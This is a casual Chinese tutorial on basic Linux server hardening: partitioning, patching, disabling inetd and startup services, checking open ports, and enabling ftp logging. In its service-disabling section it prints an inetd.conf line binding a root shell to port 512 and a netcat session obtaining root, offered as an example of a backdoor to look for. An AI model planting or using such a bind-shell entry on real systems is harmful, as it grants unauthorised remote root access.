这篇文章的目的在于让读者对linux的安全配置有个大概的了解,呵呵,因为我也看过一些关于这方面的文章,说的太空了,呵呵其实我觉得linux机器要做一般的安全配置的话,分分钟就搞定了,嘿嘿
1,安装
安装的时候,大家都轻车熟路了,呵呵,首先,隔离网络进行系统安装,当然选择custom方式,安装你需要的软件包。
硬盘分区:如果用root分区纪录数据,如log文件和email,就可能因为拒绝服务产生大量日志或垃圾邮件。导致系统崩溃。所以建议为/var开辟单独的分区,用来存放日志和邮件,以避免root分区被溢出啦,那就惨喽。最好为特殊的应用程序单独开一个分区,特别是可以产生大量日志的程序,还有建议为/home单独分一个区,这样他们就不能填满/分区了,以下是我硬盘上的分区情况:
/
root
/var
log
/hacking
嘻嘻,我的一些黑软
swap
不多说了
/home
当系统安装完重新启动后,最好打上相应系统的安全补丁,请大家养成良好的习惯,记住,你不是在自己家里装98,你装的是一个linux服务器,呵呵。对于redhat系统而言可以在:http://www.redhat.com/corp/support/errata/找到补丁。
在redhat6.1以后的版本带有一个工具up2date,它能够测定哪些rpm包需要升级,然后自动从redhat的站点下载并完成安装。
2,关闭服务
呵呵,有句话说的好,要想你的系统绝对安全,就是掐断网线,呵呵,当然我们的机器要对外提供服务,那是不现实的,所以关闭不必要的服务是必要的,因为有些服务会为您的系统带来麻烦。
默认的linux就是一个强大的系统,运行了很多的服务。但,有许多服务是不需要的,很容易引起安全风险。第一个文件是/etc/inetd.conf,它制定了/usr/sbin/inetd将要监听的服务,你可能只需要其中的两个:telnet和ftp,其他的许多如popd,imapd和rsh都是有可能引发安全问题的。用下面的命令显示没有被注释掉的服务:
suneagle# grep -v "#" /etc/inetd.conf
ftp
stream tcp
nowait
root
/usr/sbin/tcpd
in.ftpd -l -a
telnet
stream
tcp
nowait root
/usr/sbin/tcpd
in.telnetd
shell
stream
tcp
nowait
root
/usr/sbin/tcpd in.rshd
login
stream
tcp
nowait
root
/usr/sbin/tcpd in.rlogind
talk
dgram
udp
wait
nobody.tty
/usr/sbin/tcpd in.talkd
ntalk
dgram
udp
wait
nobody.tty
/usr/sbin/tcpd
in.ntalkd
pop-3
stream
tcp
nowait
root
/usr/sbin/tcpd
ipop3d
imap
stream
tcp
nowait
root
/usr/sbin/tcpd
imapd
finger
stream
tcp
nowait nobody
/usr/sbin/tcpd
in.fingerd
linuxconf stream tcp wait root /bin/linuxconf linuxconf --http
exec
stream
tcp
nowait
root
/bin/sh sh -i
哈哈,大家看最后一行,不就被绑了个rootshell么?呵呵,有什么后果?呵呵看看,在远程的一台win2000机器上用如下命令:
E:\cmdnc 192.0.0.88 512
bash# id
id
uid=0(root) gid=0(root) groups=0(root)
bash#
知道了吧?嘿嘿,大家注意哦*^_^*
我有写过一篇关于用这个文件绑后门的文章,呵呵,攻击性很强,这个命令可以帮你查出有没有后门,呵呵。
下个要启动的是.rc脚本,它们决定了init进程要启动哪些服务。redhat系统下,这些脚本在/etc/rc.d/rc3.d(如果你的系统以x为默认启动的话,就是/etc/rc.d/rc5.d)。要在启动时禁止某个服务,只需要把大写的S替换为小写的s,同时,redhat也提供一个工具来帮助你关闭服务,输入/usr/sbin/setup,然后选择"system services",就可以定制系统启动时跑哪些服务。另外一个选择是chkconfig命令,很多linux版本的系
统都自带这个工具。脚本名字中的数字是启动的顺序,以大写的K开头的是杀死进程用的。以下是一些主要的服务:
S05apmd
笔记本需要
S10xntpd
网络时间协议
S11portmap
运行rpc服务必需
S15sound
声卡相关
S15netfs
nfs客户端
S20rstatd
避免运行r服务,远程用户可以从中获取很多信息
S20rusersd
S20rwhod
S20rwalld
S20bootparamd 无盘工作站
S25squid
代理服务
S34yppasswdd
NIS服务器,此服务漏洞很多
S35ypserv
NIS服务器,此服务漏洞很多
S35dhcpd
dhcp服务
S40atd
和cron很相似的定时运行程序的服务
S45pcmcia
pcmcia卡,笔记本
S50snmpd
SNMP,远程用户能从中获得许多系统信息
S55named
DNS服务
S55routed
RIP,没有必要就别运行它
S60lpd
打印服务
S60mars-nwe
Netware的文件和打印服务
S60nfs
NFS服务器,漏洞极多
S72amd
automount,mount远程用的
S75gated
另外一种路由服务,例如OSPF
S80sendmail
邮件服务,如关闭,仍然可以发信,只是不能收信和作中继
S85httpd
web服务器
S87ypbind
NIS客户端
S90xfs
X font服务器
S95innd
News服务器
Slinuxconf
这个都熟悉吧,呵呵,通过浏览器远程管理系统用的
用这个命令察看在关闭启动脚本之前有多少服务在运行:
suneagle# ps -eaf|wc -l
54
我的系统有54种服务在运行呢,当你关闭一些服务以后,重新运行以上命令看看少了多少服务。运行的服务越少,系统自然越安全了,嘿嘿。用下面命令察看哪些服务在运行:
suneagle# netstat -na --ip
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address
Foreign Address
State
tcp
0
136 192.0.0.88:23
192.0.0.5:1236
ESTABLISHED
tcp
0
0 192.0.0.88:23
192.0.0.8:1113
ESTABLISHED
tcp
0
0 192.0.0.88:139
192.0.0.8:1112
ESTABLISHED
tcp
0
0 192.0.0.88:1024
61.153.17.24:23
ESTABLISHED
tcp
0
0 192.0.0.88:23
192.0.0.8:1084
ESTABLISHED
tcp
0
0 0.0.0.0:139
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:80
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:25
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:515
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:512
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:98
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:79
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:143
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:110
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:513
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:514
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:23
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:21
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:113
0.0.0.0:*
LISTEN
tcp
0
0 0.0.0.0:111
0.0.0.0:*
LISTEN
udp
0
0 127.0.0.1:1024
0.0.0.0:*
udp
0
0 192.0.0.88:138
0.0.0.0:*
udp
0
0 192.0.0.88:137
0.0.0.0:*
udp
0
0 0.0.0.0:138
0.0.0.0:*
udp
0
0 0.0.0.0:137
0.0.0.0:*
udp
0
0 0.0.0.0:518
0.0.0.0:*
udp
0
0 0.0.0.0:517
0.0.0.0:*
udp
0
0 0.0.0.0:111
0.0.0.0:*
raw
0
0 0.0.0.0:1
0.0.0.0:*
7
raw
0
0 0.0.0.0:6
0.0.0.0:*
7
呵呵,我这个系统由于测试用,所以故意开了不少危险端口,呵呵,大家别学我哦,该关的就关啦,哈哈。
3,日志纪录和增强
关闭一些不必要的服务以后,日志也是需要我们关心的一块,配置好的unix系统日志非常强大,甚至可以做出陷阱,关于日志,我可以写长篇大论,这里就不很详细讲述日志的原理了,感兴趣的朋友可以参考相关资料或阅读我的另一篇文章《solaris系统日志原理》。好!所有的日志都在/var/log下(仅对linux系统而言),默认情况下linux的日志就很强大了,除了ftp。但我们可以通过修改/etc/ftpaccess或者/etc/inetd.conf,来保证每一个ftp连接日志都能够纪录下来。下面是一个修改inetd.conf的例子:
ftp
stream
tcp
nowait
root
/usr/sbin/tcpd
in.ftpd -l -L -i -o
-l
每一个ftp连接都写到syslog
-L
纪录用户的每一个命令
-i
文件received,纪录到xferlog
-o
文件transmitted,记录到xferlog